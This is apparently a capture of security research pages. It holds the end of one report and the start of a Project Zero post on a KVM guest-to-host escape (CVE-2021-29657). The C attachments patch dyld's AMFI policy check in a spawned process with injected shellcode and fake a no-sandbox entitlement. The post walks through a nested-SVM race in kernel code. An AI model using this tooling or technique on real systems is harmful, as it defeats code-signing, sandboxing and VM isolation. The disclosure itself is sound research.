// <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"\>

// <plist version="1.0">

// <dict>

// Β  Β  <key>com.apple.security.cs.debugger</key>

// Β  Β  <true/>

// </dict>

// </plist>

// EOF

// # Find available code signing identities using `security find-identity`

// codesign -s "$IDENTITY" --entitlements entitlements.xml runner

//

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

#include <dlfcn.h>

#include <signal.h>

#include <unistd.h>

#include <spawn.h>

#include <sys/wait.h>

#include <mach/mach_init.h>

#include <mach/vm_map.h>

#include <mach/vm_page_size.h>

#define page_align(addr) (vm_address_t)((uintptr_t)(addr) & (~(vm_page_size - 1)))

#define PLATFORM_IOS 2

extern char **environ;

extern int posix_spawnattr_set_platform_np(posix_spawnattr_t*, int, int);

void instrument(pid_t pid) {

Β  Β  kern_return_t kr;

Β  Β  task_t task;

Β  Β  puts("[*] Patching child process to allow dyld interposing...");

Β  Β  // Find patch point

Β  Β  FILE* output = popen("nm -arch arm64e /usr/lib/dyld Β | grep _amfi_check_dyld_policy_self", "r");

Β  Β  unsigned int patch_offset;

Β  Β  int r = fscanf(output, "%x t _amfi_check_dyld_policy_self", &patch_offset);

Β  Β  if (r != 1) {

Β  Β  Β  Β  printf("Failed to find offset of _amfi_check_dyld_policy_self in /usr/lib/dyld\n");

Β  Β  Β  Β  return;

Β  Β  }

Β  Β  printf("[*] _amfi_check_dyld_policy_self at offset 0x%x in /usr/lib/dyld\n", patch_offset);

Β  Β 

Β  Β  // Attach to the target process

Β  Β  kr = task_for_pid(mach_task_self(), pid, &task);

Β  Β  if (kr != KERN_SUCCESS) {

Β  Β  Β  Β  printf("task_for_pid failed. Is this binary signed and possesses the com.apple.security.cs.debugger entitlement?\n");

Β  Β  Β  Β  return;

Β  Β  }

Β  Β  vm_address_t dyld_addr = 0;

Β  Β  int headers_found = 0;

Β  Β  vm_address_t addr = 0;

Β  Β  vm_size_t size;

Β  Β  vm_region_submap_info_data_64_t info;

Β  Β  mach_msg_type_number_t info_count = VM_REGION_SUBMAP_INFO_COUNT_64;

Β  Β  unsigned int depth = 0;

Β  Β  while (1) {

Β  Β  Β  Β  // get next memory region

Β  Β  Β  Β  kr = vm_region_recurse_64(task, &addr, &size, &depth, (vm_region_info_t)&info, &info_count);

Β  Β  Β  Β  if (kr != KERN_SUCCESS)

Β  Β  Β  Β  Β  Β  break;

Β  Β  Β  Β  unsigned int header;

Β  Β  Β  Β  vm_size_t bytes_read;

Β  Β  Β  Β  kr = vm_read_overwrite(task, addr, 4, (vm_address_t)&header, &bytes_read);

Β  Β  Β  Β  if (kr != KERN_SUCCESS) {

Β  Β  Β  Β  Β  Β  // TODO handle this, some mappings are probably just not readable

Β  Β  Β  Β  Β  Β  printf("vm_read_overwrite failed\n");

Β  Β  Β  Β  Β  Β  return;

Β  Β  Β  Β  }

Β  Β  Β  Β  if (bytes_read != 4) {

Β  Β  Β  Β  Β  Β  // TODO handle this properly

Β  Β  Β  Β  Β  Β  printf("[-] vm_read read to few bytes\n");

Β  Β  Β  Β  Β  Β  return;

Β  Β  Β  Β  }

Β  Β  Β  Β  if (header == 0xfeedfacf) {

Β  Β  Β  Β  Β  Β  headers_found++;

Β  Β  Β  Β  }

Β  Β  Β  Β  if (headers_found == 2) {

Β  Β  Β  Β  Β  Β  // This is dyld

Β  Β  Β  Β  Β  Β  dyld_addr = addr;

Β  Β  Β  Β  Β  Β  break;

Β  Β  Β  Β  }

Β  Β  Β  Β  addr += size;

Β  Β  }

Β  Β  if (dyld_addr == 0) {

Β  Β  Β  Β  printf("[-] Failed to find /usr/lib/dyld\n");

Β  Β  Β  Β  return;

Β  Β  }

Β  Β  printf("[*] /usr/lib/dyld mapped at 0x%lx\n", dyld_addr);

Β  Β  vm_address_t patch_addr = dyld_addr + patch_offset;

Β  Β  // VM_PROT_COPY forces COW, probably, see vm_map_protect in vm_map.c

Β  Β  kr = vm_protect(task, page_align(patch_addr), vm_page_size, false, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY);

Β  Β  if (kr != KERN_SUCCESS) {

Β  Β  Β  Β  printf("vm_protect failed\n");

Β  Β  Β  Β  return;

Β  Β  }

Β  Β 

Β  Β  // MOV X8, 0x5f

Β  Β  // STR X8, [X1]

Β  Β  // RET

Β  Β  const char* code = "\xe8\x0b\x80\xd2\x28\x00\x00\xf9\xc0\x03\x5f\xd6";

Β  Β  kr = vm_write(task, patch_addr, (vm_offset_t)code, 12);

Β  Β  if (kr != KERN_SUCCESS) {

Β  Β  Β  Β  printf("vm_write failed\n");

Β  Β  Β  Β  return;

Β  Β  }

Β  Β  kr = vm_protect(task, page_align(patch_addr), vm_page_size, false, VM_PROT_READ | VM_PROT_EXECUTE);

Β  Β  if (kr != KERN_SUCCESS) {

Β  Β  Β  Β  printf("vm_protect failed\n");

Β  Β  Β  Β  return;

Β  Β  }

Β  Β  puts("[+] Successfully patched _amfi_check_dyld_policy_self");

}

int run(const char** argv) {

Β  Β  pid_t pid;

Β  Β  int rv;

Β  Β  posix_spawnattr_t attr;

Β  Β  rv = posix_spawnattr_init(&attr);

Β  Β  if (rv != 0) {

Β  Β  Β  Β  perror("posix_spawnattr_init");

Β  Β  Β  Β  return -1;

Β  Β  }

Β  Β  rv = posix_spawnattr_setflags(&attr, POSIX_SPAWN_START_SUSPENDED);

Β  Β  if (rv != 0) {

Β  Β  Β  Β  perror("posix_spawnattr_setflags");

Β  Β  Β  Β  return -1;

Β  Β  }

Β  Β  rv = posix_spawnattr_set_platform_np(&attr, PLATFORM_IOS, 0);

Β  Β  if (rv != 0) {

Β  Β  Β  Β  perror("posix_spawnattr_set_platform_np");

Β  Β  Β  Β  return -1;

Β  Β  }

Β  Β  rv = posix_spawn(&pid, argv[0], NULL, &attr, argv, environ);

Β  Β  if (rv != 0) {

Β  Β  Β  Β  perror("posix_spawn");

Β  Β  Β  Β  return -1;

Β  Β  }

Β  Β  printf("[+] Child process created with pid: %i\n", pid);

Β  Β  instrument(pid);

Β  Β  printf("[*] Sending SIGCONT to continue child\n");

Β  Β  kill(pid, SIGCONT);

Β  Β  int status;

Β  Β  rv = waitpid(pid, &status, 0);

Β  Β  if (rv == -1) {

Β  Β  Β  Β  Β perror("waitpid");

Β  Β  Β  Β  return -1;

Β  Β  }

Β  Β  printf("[*] Child exited with status %i\n", status);

Β  Β  posix_spawnattr_destroy(&attr);

Β  Β  return 0;

}

int main(int argc, char* argv[]) {

Β  Β  if (argc <= 1) {

Β  Β  Β  Β  printf("Usage: %s path/to/ios_binary\n", argv[0]);

Β  Β  Β  Β  return 0;

Β  Β  }

Β  Β  printf("[*] Preparing to execute iOS binary %s\n", argv[1]);

Β  Β  return run(argv + 1);

}

Attachment 2: interpose.c

// clang interpose.c -arch arm64 -o interpose.dylib -shared -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk

#include <stdio.h>

#include <unistd.h>

typedef void* xpc_object_t;

extern xpc_object_t xpc_dictionary_create(void*, void*, int);

extern void xpc_dictionary_set_value(xpc_object_t, const char*, xpc_object_t);

extern xpc_object_t xpc_bool_create(int);

extern xpc_object_t xpc_copy_entitlements_for_self();

// From https://opensource.apple.com/source/dyld/dyld-97.1/include/mach-o/dyld-interposing.h.auto.html

/*

Β * Β Example:

Β *

Β * Β static

Β * Β int

Β * Β my_open(const char* path, int flags, mode_t mode)

Β * Β {

Β * Β  Β int value;

Β * Β  Β // do stuff before open (including changing the arguments)

Β * Β  Β value = open(path, flags, mode);

Β * Β  Β // do stuff after open (including changing the return value(s))

Β * Β  Β return value;

Β * Β }

Β * Β DYLD_INTERPOSE(my_open, open)

Β */

#define DYLD_INTERPOSE(_replacment,_replacee) \

Β  Β __attribute__((used)) static struct{ const void* replacment; const void* replacee; } _interpose_##_replacee \

Β  Β  Β  Β  Β  Β  __attribute__ ((section ("__DATA,__interpose"))) = { (const void*)(unsigned long)&_replacment, (const void*)(unsigned long)&_replacee };

xpc_object_t my_xpc_copy_entitlements_for_self() {

Β  Β  puts("[*] Faking com.apple.private.security.no-sandbox entitlement in interposed xpc_copy_entitlements_for_self");

Β  Β  xpc_object_t dict = xpc_dictionary_create(NULL, NULL, 0);

Β  Β  xpc_dictionary_set_value(dict, "com.apple.private.security.no-sandbox", xpc_bool_create(1));

Β  Β  return dict;

}

DYLD_INTERPOSE(my_xpc_copy_entitlements_for_self, xpc_copy_entitlements_for_self);

An EPYC escape: Case-study of a KVM breakout

By: Ryan
29 June 2021 at 15:58

Posted by Felix Wilhelm, Project Zero

Introduction

KVM (for Kernel-based Virtual Machine) is the de-facto standard hypervisor for Linux-based cloud environments. Outside of Azure, almost all large-scale cloud and hosting providers are running on top of KVM, turning it into one of the fundamental security boundaries in the cloud.

In this blog post I describe a vulnerabilityΒ in KVM’s AMD-specific code and discuss how this bug can be turned into a full virtual machine escape. To the best of my knowledge, this is the first public writeup of a KVM guest-to-host breakout that does not rely on bugs in user space components such as QEMU. The discussed bug was assigned CVE-2021-29657, affects kernel versions v5.10-rc1 to v5.12-rc6Β and was patched at the end of MarchΒ 2021.Β As the bug only became exploitable in v5.10 and was discovered roughly 5 months later, most real world deployments of KVM should not be affected. I still think the issue is an interesting case study in the work required to build a stable guest-to-host escape against KVM and hope that this writeup can strengthen the case that hypervisor compromises are not only theoretical issues.

I start with a short overview of KVM’s architecture, before diving into the bug and its exploitation.

KVM

KVM is a Linux based open source hypervisor supporting hardware accelerated virtualization on x86, ARM, PowerPC and S/390. In contrast to the other big open source hypervisor Xen, KVM is deeply integrated with the Linux Kernel and builds on its scheduling, memory management and hardware integrations to provide efficient virtualization.

KVM is implemented as one or more kernel modules (kvm.ko plus kvm-intel.ko or kvm-amd.ko on x86) that expose a low-level IOCTL-based APIΒ to user space processes over the /dev/kvm device. Using this API, a user space process (often called VMM for Virtual Machine Manager) can create new VMs, assign vCPUs and memory, and intercept memory or IO accesses to provide access to emulated or virtualization-aware hardware devices. QEMUΒ has been the standard user space choice for KVM-based virtualization for a long time, but in the last few years alternatives like LKVM, crosvmΒ or FirecrackerΒ have started to become popular.

While KVM’s reliance on a separate user space component might seem complicated at first, it has a very nice benefit: Each VM running on a KVM host has a 1:1 mapping to a Linux process, making it managable using standard Linux tools.

This means for example, that a guest's memory can be inspected by dumping the allocated memory of its user space process or that resource limits for CPU time and memory can be applied easily. Additionally, KVM can offload most work related to device emulation to the userspace component. Outside of a couple of performance-sensitive devices related to interrupt handling, all of the complex low-level code for providing virtual disk, network or GPU access can be implemented in userspace. Β 

When looking at public writeups of KVM-related vulnerabilities and exploits it becomes clear that this design was a wise decision. The large majority of disclosed vulnerabilities and all publicly available exploits affect QEMU and its support for emulated/paravirtualized devices.

Even though KVM’s kernel attack surface is significantly smaller than the one exposed by a default QEMU configuration or similar user space VMMs, a KVM vulnerability has advantages that make it very valuable for an attacker:

  • Whereas user space VMMs can be sandboxed to reduce the impact of a VM breakout, no such option is available for KVM itself. Once an attacker is able to achieve code execution (or similarly powerful primitives like write access to page tables) in the context of the host kernel, the system is fully compromised.
  • Due to the somewhat poor security history of QEMU, new user space VMMs like crosvm or Firecracker are written in Rust, a memory safe language. Of course, there can still be non-memory safety vulnerabilities or problems due to incorrect or buggy usage of the KVM APIs, but using Rust effectively prevents the large majority of bugs that were discovered in C-based user space VMMs in the past.
  • Finally, a pure KVM exploit can work against targets that use proprietary or heavily modified user space VMMs. While the big cloud providers do not go into much detail about their virtualization stacks publicly, it is safe to assume that they do not depend on an unmodified QEMU version for their production workloads. In contrast, KVM’s smaller code base makes heavy modifications unlikely (and KVM’s contributor list points at a strong tendency to upstream such modifications when they exist). Β 

With these advantages in mind, I decided to spend some time hunting for a KVM vulnerability that could be turned into a guest-to-host escape. In the past, I had some successΒ with finding vulnerabilities in KVM’s support for nested virtualization on Intel CPUs so reviewing the same functionality for AMD seemed like a good starting point. This is even more true,Β because the recent increase of AMD’s market share in the server segment means that KVM’s AMD implementation is suddenly becoming a more interesting target than it was in the last years.

Nested virtualization, the ability for a VM (called L1) to spawn nested guests (L2), was also a niche feature for a long time. However, due to hardware improvements that reduce its overhead and increasing customer demand it’s becoming more widely available. For example, Microsoft is heavily pushing for Virtualization-based SecurityΒ as part of newer Windows versions, requiring nested virtualization to support cloud-hosted Windows installations. KVM enables support for nested virtualization on both AMDΒ andΒ Intel by default, so if an administrator or the user space VMM does not explicitly disable it, it’s part of the attack surface for a malicious or compromised VM.

AMD’s virtualization extension is called SVM (for Secure Virtual Machine) and in order to support nested virtualization, the host hypervisor needs to intercept all SVM instructions that are executed by its guests, emulate their behavior and keep its state in sync with the underlying hardware. As you might imagine, implementing this correctly is quite difficult with a large potential for complex logic flaws, making it a perfect target for manual code review.

The Bug

Before diving into the KVM codebase and the bug I discovered, I want to quickly introduce how AMD SVM works to make the rest of the post easier to understand. (For a thorough documentation see AMD64 Architecture Programmer’s Manual, Volume 2: System Programming Chapter 15.) SVM adds support for 6 new instructions to x86-64 if SVM support is enabled by setting the SVME bit in the EFER MSR. The most interesting of these instructions is VMRUN, which (as its name suggests) is responsible for running a guest VM. VMRUN takes an implicit parameter via the RAX register pointing to the page-aligned physical address of a data structure called β€œvirtual machine control block” (VMCB), which describes the state and configuration of the VM.

The VMCB is split into two parts: First, the State Save area, which stores the values of all guest registers, including segment and control registers. Second, the Control area which describes the configuration of the VM. The Control area describes the virtualization features enabled for a VM, Β sets which VM actions are intercepted to trigger a VM exit andΒ stores some fundamental configuration values such as the page table address used for nested paging.

If the VMCB is correctly prepared (and we are not already running in a VM), VMRUN will first save the host state in a memory region called the host save area, whose address is configured by writing a physical address to the VM_HSAVE_PA MSR. Once the host state is saved, the CPU switches to the VM context and VMRUN only returns once a VM exit is triggered for one reason or another.

An interesting aspect of SVM is that a lot of the state recovery after a VM exit has to be done by the hypervisor. Once a VM exit occurs, only RIP, RSP and RAX are restored to the previous host values and all other general purpose registers still contain the guest values. In addition, a full context switch requires manual execution of the VMSAVE/VMLOAD instructions which save/load additional system registers (FS, SS, LDTR, STAR, LSTAR …) from memory.

For nested virtualization to work, KVM intercepts execution of the VMRUN instruction and creates its own VMCB based on the VMCB the L1 guest prepared (called vmcb12 in KVM terminology). Of course, KVM can’t trust the guest provided vmcb12 and needs to carefully validate all fields that end up in the real VMCB that gets passed to the hardware (known as vmcb02).

Most of the KVM’s code for nested virtualization on AMD is implemented in arch/x86/kvm/svm/nested.cΒ and the code that intercepts VMRUN instructions of nested guests is implemented in nested_svm_vmrun:

intΒ nested_svm_vmrun(structΒ vcpu_svm *svm)

{

Β  Β  Β  Β  intΒ ret;

Β  Β  Β  Β  structΒ vmcb *vmcb12;

Β  Β  Β  Β  structΒ vmcb *hsave =Β svm->nested.hsave;

Β  Β  Β  Β  structΒ vmcb *vmcb =Β svm->vmcb;

Β  Β  Β  Β  structΒ kvm_host_map map;

Β  Β  Β  Β  u64 vmcb12_gpa;

Β  Β 

Β  Β  Β  Β  vmcb12_gpa =Β svm->vmcb->save.rax; ** 1Β **Β 

Β  Β  Β  Β  ret =Β kvm_vcpu_map(&svm->vcpu,Β gpa_to_gfn(vmcb12_gpa),Β &map); ** 2Β **

Β  Β  Β  Β  …

Β  Β  Β  Β  ret =Β kvm_skip_emulated_instruction(&svm->vcpu);

Β  Β  Β  Β  vmcb12 =Β map.hva;

Β  Β  Β  Β  ifΒ (!nested_vmcb_checks(svm,Β vmcb12))Β { ** 3Β **

Β  Β  Β  Β  Β  Β  Β  Β  vmcb12->control.exit_code Β  Β =Β SVM_EXIT_ERR;

Β  Β  Β  Β  Β  Β  Β  Β  vmcb12->control.exit_code_hi =Β 0;

Β  Β  Β  Β  Β  Β  Β  Β  vmcb12->control.exit_info_1 Β =Β 0;

Β  Β  Β  Β  Β  Β  Β  Β  vmcb12->control.exit_info_2 Β =Β 0;

Β  Β  Β  Β  Β  Β  Β  Β  gotoΒ out;

Β  Β  Β  Β  }

Β  Β  Β  Β  ...

Β  Β  Β  Β  /*

Β  Β  Β  Β  Β * Save the old vmcb, so we don't need to pick what we save, but can

Β  Β  Β  Β  Β * restore everything when a VMEXIT occurs

Β  Β  Β  Β  Β */

Β  Β  Β  Β  hsave->save.es Β  Β  =Β vmcb->save.es;

Β  Β  Β  Β  hsave->save.cs Β  Β  =Β vmcb->save.cs;

Β  Β  Β  Β  hsave->save.ss Β  Β  =Β vmcb->save.ss;

Β  Β  Β  Β  hsave->save.ds Β  Β  =Β vmcb->save.ds;

Β  Β  Β  Β  hsave->save.gdtr Β  =Β vmcb->save.gdtr;

Β  Β  Β  Β  hsave->save.idtr Β  =Β vmcb->save.idtr;

Β  Β  Β  Β  hsave->save.efer Β  =Β svm->vcpu.arch.efer;

Β  Β  Β  Β  hsave->save.cr0 Β  Β =Β kvm_read_cr0(&svm->vcpu);

Β  Β  Β  Β  hsave->save.cr4 Β  Β =Β svm->vcpu.arch.cr4;

Β  Β  Β  Β  hsave->save.rflags =Β kvm_get_rflags(&svm->vcpu);

Β  Β  Β  Β  hsave->save.rip Β  Β =Β kvm_rip_read(&svm->vcpu);

Β  Β  Β  Β  hsave->save.rsp Β  Β =Β vmcb->save.rsp;

Β  Β  Β  Β  hsave->save.rax Β  Β =Β vmcb->save.rax;

Β  Β  Β  Β  ifΒ (npt_enabled)

Β  Β  Β  Β  Β  Β  Β  Β  hsave->save.cr3 Β  Β =Β vmcb->save.cr3;

Β  Β  Β  Β  else

Β  Β  Β  Β  Β  Β  Β  Β  hsave->save.cr3 Β  Β =Β kvm_read_cr3(&svm->vcpu);

Β  Β  Β  Β  copy_vmcb_control_area(&hsave->control,Β &vmcb->control);

Β  Β  Β  Β  svm->nested.nested_run_pending =Β 1;

Β  Β  Β  Β  ifΒ (enter_svm_guest_mode(svm,Β vmcb12_gpa,Β vmcb12)) ** 4Β **

Β  Β  Β  Β  Β  Β  Β  Β  gotoΒ out_exit_err;

Β  Β  Β  Β  ifΒ (nested_svm_vmrun_msrpm(svm))

Β  Β  Β  Β  Β  Β  Β  Β  gotoΒ out;

out_exit_err:

Β  Β  Β  Β  svm->nested.nested_run_pending =Β 0;

Β  Β  Β  Β  svm->vmcb->control.exit_code Β  Β =Β SVM_EXIT_ERR;

Β  Β  Β  Β  svm->vmcb->control.exit_code_hi =Β 0;

Β  Β  Β  Β  svm->vmcb->control.exit_info_1 Β =Β 0;

Β  Β  Β  Β  svm->vmcb->control.exit_info_2 Β =Β 0;

Β  Β  Β  Β  nested_svm_vmexit(svm);

out:

Β  Β  Β  Β  kvm_vcpu_unmap(&svm->vcpu,Β &map,Β true);

Β  Β  Β  Β  returnΒ ret;

}

The function first fetches the value of RAX out of the currently active vmcb (svm->vcmb) in 1 (numbers are marked in the code samples). For guests using nested paging (which is the only relevant configuration nowadays) RAX contains a guest physical address (GPA), which needs to be translated into a host physical address (HPA) first. kvm_vcpu_mapΒ (2) takes care of this translation and maps the underlying page to a host virtual address (HVA) that can be directly accessed by KVM.

Once the VMCB is mapped, nested_vmcb_checksΒ is called for some basic validation in 3. Afterwards, the L1 guest context which is stored in svm->vmcbΒ is copied into the host save area svm->nested.hsaveΒ before KVM enters the nested guest context by calling enter_svm_guest_modeΒ (4).

intΒ enter_svm_guest_mode(structΒ vcpu_svm *svm,Β u64 vmcb12_gpa,

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β structΒ vmcb *vmcb12)

{

Β  Β  Β  Β  intΒ ret;

Β  Β  Β  Β  svm->nested.vmcb12_gpa =Β vmcb12_gpa;

Β  Β  Β  Β  load_nested_vmcb_control(svm,Β &vmcb12->control);

Β  Β  Β  Β  nested_prepare_vmcb_save(svm,Β vmcb12);

Β  Β  Β  Β  nested_prepare_vmcb_control(svm);

Β  Β  Β  Β  ret =Β nested_svm_load_cr3(&svm->vcpu,Β vmcb12->save.cr3,

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  nested_npt_enabled(svm));

Β  Β  Β  Β  ifΒ (ret)

Β  Β  Β  Β  Β  Β  Β  Β  returnΒ ret;

Β  Β  Β  Β  svm_set_gif(svm,Β true);

Β  Β  Β  Β  returnΒ 0;

}

staticΒ voidΒ load_nested_vmcb_control(structΒ vcpu_svm *svm,

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β structΒ vmcb_control_area *control)

{

Β  Β  Β  Β  copy_vmcb_control_area(&svm->nested.ctl,Β control);

Β  Β  Β  Β  ...

}

Looking at enter_svm_guest_modeΒ we can see that KVM copies the vmcb12 control area directly into svm->nested.ctl and does not perform any further checks on the copied value.

Readers familiar with double fetch or Time-of-Check-to-Time-of-Use vulnerabilities might already see a potential issue here: The call to nested_vmcb_checksΒ at the beginning of nested_svm_vmrunΒ performs all of its checks on a copy of the VMCB that is stored in guest memory. This means that a guest with multiple CPU cores can modify fields in the VMCB after they are verified in nested_vmcb_checks, but before they are copied to svm->nested.ctl in load_nested_vmcb_control.

Let’s look at nested_vmcb_checks to see what kind of checks we can bypass with this approach:

staticΒ boolΒ nested_vmcb_check_controls(structΒ vmcb_control_area *control)

{

Β  Β  Β  Β  ifΒ ((vmcb_is_intercept(control,Β INTERCEPT_VMRUN))Β ==Β 0)

Β  Β  Β  Β  Β  Β  Β  Β  returnΒ false;

Β  Β  Β  Β  ifΒ (control->asid ==Β 0)

Β  Β  Β  Β  Β  Β  Β  Β  returnΒ false;

Β  Β  Β  Β  ifΒ ((control->nested_ctl &Β SVM_NESTED_CTL_NP_ENABLE)Β &&

Β  Β  Β  Β  Β  Β  !npt_enabled)

Β  Β  Β  Β  Β  Β  Β  Β  returnΒ false;

Β  Β  Β  Β  returnΒ true;

}

At first glance this looks pretty harmless. control->asidΒ isn’t used anywhere and the last check is only relevant for systems where nested paging isn’t supported. However, the first check turns out to be very interesting.

For reasons unknown to me, SVM VMCBs contain a bit that enables or disables interception of the VMRUN instruction when executed inside a guest. Clearing this bit isn’t actually supported by hardware and results in an immediate VMEXIT, so the check in nested_vmcb_check_controlsΒ simply replicates this behavior. Β When we race and bypass the check by repeatedly flipping the value of the INTERCEPT_VMRUN bit, we can end up in a situation where svm->nested.ctl contains a 0 in place of the INTERCEPT_VMRUN bit. To understand the impact we first need to see how nested vmexit’s are handled in KVM:

The main SVM exit handler is the function handle_exitΒ in arch/x86/kvm/svm.c, which is called whenever a VMexit occurs. When KVM is running a nested guest, it first has to check if the exit should be handled by itself or the L1 hypervisor. To do this it calls the function nested_svm_exit_handledΒ (5) which will return NESTED_EXIT_DONE if the vmexit will be handled by the L1 hypervisor and no further processing by the L0 hypervisor is needed:

Β staticΒ intΒ handle_exit(structΒ kvm_vcpu *vcpu,Β fastpath_t exit_fastpath)

{

Β  Β  Β  Β  structΒ vcpu_svm *svm =Β to_svm(vcpu);

Β  Β  Β  Β  structΒ kvm_run *kvm_run =Β vcpu->run;

Β  Β  Β  Β  u32 exit_code =Β svm->vmcb->control.exit_code;

Β  Β  Β  Β  … 

Β  Β  Β  Β  ifΒ (is_guest_mode(vcpu))Β {

Β  Β  Β  Β  Β  Β  Β  Β  intΒ vmexit;

Β  Β  Β  Β  Β  Β  Β  Β  trace_kvm_nested_vmexit(exit_code,Β vcpu,Β KVM_ISA_SVM);

Β  Β  Β  Β  Β  Β  Β  Β  vmexit =Β nested_svm_exit_special(svm);

Β  Β  Β  Β  Β  Β  Β  Β  ifΒ (vmexit ==Β NESTED_EXIT_CONTINUE)

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  vmexit =Β nested_svm_exit_handled(svm);Β **Β 5Β **

Β  Β  Β  Β  Β  Β  Β  Β  ifΒ (vmexit ==Β NESTED_EXIT_DONE)

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  returnΒ 1;

Β  Β  Β  Β  }

}

staticΒ intΒ nested_svm_intercept(structΒ vcpu_svm *svm)

{

Β  Β  Β  Β  // exit_code==INTERCEPT_VMRUN when the L2 guest executes vmrun

Β  Β  Β  Β  u32 exit_code =Β svm->vmcb->control.exit_code;

Β  Β  Β  Β  intΒ vmexit =Β NESTED_EXIT_HOST;

Β  Β  Β  Β  switchΒ (exit_code)Β {

Β  Β  Β  Β  caseΒ SVM_EXIT_MSR:

Β  Β  Β  Β  Β  Β  Β  Β  vmexit =Β nested_svm_exit_handled_msr(svm);

Β  Β  Β  Β  Β  Β  Β  Β  break;

Β  Β  Β  Β  caseΒ SVM_EXIT_IOIO:

Β  Β  Β  Β  Β  Β  Β  Β  vmexit =Β nested_svm_intercept_ioio(svm);

Β  Β  Β  Β  Β  Β  Β  Β  break;

Β  Β  Β  Β  … 

Β  Β  Β  Β  default:Β {

Β  Β  Β  Β  Β  Β  Β  Β  ifΒ (vmcb_is_intercept(&svm->nested.ctl,Β exit_code))Β **Β 7Β **

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  vmexit =Β NESTED_EXIT_DONE;

Β  Β  Β  Β  }

Β  Β  Β  Β  }

Β  Β  Β  Β  returnΒ vmexit;

}

intΒ nested_svm_exit_handled(structΒ vcpu_svm *svm)

{

Β  Β  Β  Β  intΒ vmexit;

Β  Β  Β  Β  vmexit =Β nested_svm_intercept(svm);Β **Β 6Β **Β 

Β  Β  Β  Β  ifΒ (vmexit ==Β NESTED_EXIT_DONE)

Β  Β  Β  Β  Β  Β  Β  Β  nested_svm_vmexit(svm);Β **Β 8Β **

Β  Β  Β  Β  returnΒ vmexit;

}

nested_svm_exit_handledΒ first calls nested_svm_intercept (6)Β to see if the exit should be handled. When we trigger an exit by executing VMRUN in a L2 guest, the default case is executed (7) to see if the INTERCEPT_VMRUN bit in svm->nested.ctl is set. Normally, this should always be the case and the function returns NESTED_EXIT_DONE to trigger a nested VM exit from L2 to L1 and to let the L1 hypervisor handle the exit (8). (This way KVM supports infinite nesting of hypervisors).

However, if the L1 guest exploited the race condition described above svm->nested.ctl won’t have the INTERCEPT_VMRUN bit set and the VM exit will be handled by KVM itself. This results in a second call to nested_svm_vmrunΒ while still running inside the L2 guest context. nested_svm_vmrunΒ isn’t written to handle this situation and will blindly overwrite the L1 context stored in svm->nested.hsaveΒ with data from the currently active svm->vmcbΒ which contains data for the L2 guest:

Β Β  Β  /*

Β  Β  Β  Β  Β * Save the old vmcb, so we don't need to pick what we save, but can

Β  Β  Β  Β  Β * restore everything when a VMEXIT occurs

Β  Β  Β  Β  Β */

Β  Β  Β  Β  hsave->save.es Β  Β  =Β vmcb->save.es;

Β  Β  Β  Β  hsave->save.cs Β  Β  =Β vmcb->save.cs;

Β  Β  Β  Β  hsave->save.ss Β  Β  =Β vmcb->save.ss;

Β  Β  Β  Β  hsave->save.ds Β  Β  =Β vmcb->save.ds;

Β  Β  Β  Β  hsave->save.gdtr Β  =Β vmcb->save.gdtr;

Β  Β  Β  Β  hsave->save.idtr Β  =Β vmcb->save.idtr;

Β  Β  Β  Β  hsave->save.efer Β  =Β svm->vcpu.arch.efer;

Β  Β  Β  Β  hsave->save.cr0 Β  Β =Β kvm_read_cr0(&svm->vcpu);

Β  Β  Β  Β  hsave->save.cr4 Β  Β =Β svm->vcpu.arch.cr4;

Β  Β  Β  Β  hsave->save.rflags =Β kvm_get_rflags(&svm->vcpu);

Β  Β  Β  Β  hsave->save.rip Β  Β =Β kvm_rip_read(&svm->vcpu);

Β  Β  Β  Β  hsave->save.rsp Β  Β =Β vmcb->save.rsp;

Β  Β  Β  Β  hsave->save.rax Β  Β =Β vmcb->save.rax;

Β  Β  Β  Β  ifΒ (npt_enabled)

Β  Β  Β  Β  Β  Β  Β  Β  hsave->save.cr3 Β  Β =Β vmcb->save.cr3;

Β  Β  Β  Β  else

Β  Β  Β  Β  Β  Β  Β  Β  hsave->save.cr3 Β  Β =Β kvm_read_cr3(&svm->vcpu);

Β  Β  Β  Β  copy_vmcb_control_area(&hsave->control,Β &vmcb->control);

This becomes a security issue due to the way Model Specific Register (MSR) intercepts are handled for nested guests:

SVM uses a permission bitmap to control which MSRs can be accessed by a VM. The bitmap is a 8KB data structure with two bits per MSR, one of which controls read access and the other write access. A 1 bit in this position means the access is intercepted and triggers a vm exit, a 0 bit means the VM has direct access to the MSR. The HPA address of the bitmap is stored in the VMCB control area and for normal L1 KVM guests, the pages are allocated and pinned into memory as soon as a vCPU is created.

For a nested guest, the MSR permission bitmap is stored in svm->nested.msrpmΒ and its physical address is copied into the active VMCB (in svm->vmcb->control.msrpm_base_pa) while the nested guest is running. Using the described double invocation of nested_svm_vmrun, a malicious guest can copy this value into the svm->nested.hsaveΒ VMCB when copy_vmcb_control_areaΒ is executed. This is interesting because the KVM’s hsave area normally only contains data from the L1 guest context so svm->nested.hsave.msrpm_base_paΒ would normally point to the pinned vCPU-specific MSR bitmap pages.

This edge case becomes exploitable thanks to a relatively recent change in KVM:

Since commit β€œ2fcf4876: KVM: nSVM: implement on demand allocation of the nested state” from last October, svm->nested.msrpm is dynamically allocated and freed when a guest changes the SVME bit of the MSR_EFER register:

intΒ svm_set_efer(structΒ kvm_vcpu *vcpu,Β u64 efer)

{

Β  Β  Β  Β  structΒ vcpu_svm *svm =Β to_svm(vcpu);

Β  Β  Β  Β  u64 old_efer =Β vcpu->arch.efer;

Β  Β  Β  Β  vcpu->arch.efer =Β efer;

Β  Β  Β  Β  ifΒ ((old_efer &Β EFER_SVME)Β !=Β (efer &Β EFER_SVME))Β {

Β  Β  Β  Β  Β  Β  Β  Β  ifΒ (!(efer &Β EFER_SVME))Β {

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  svm_leave_nested(svm);

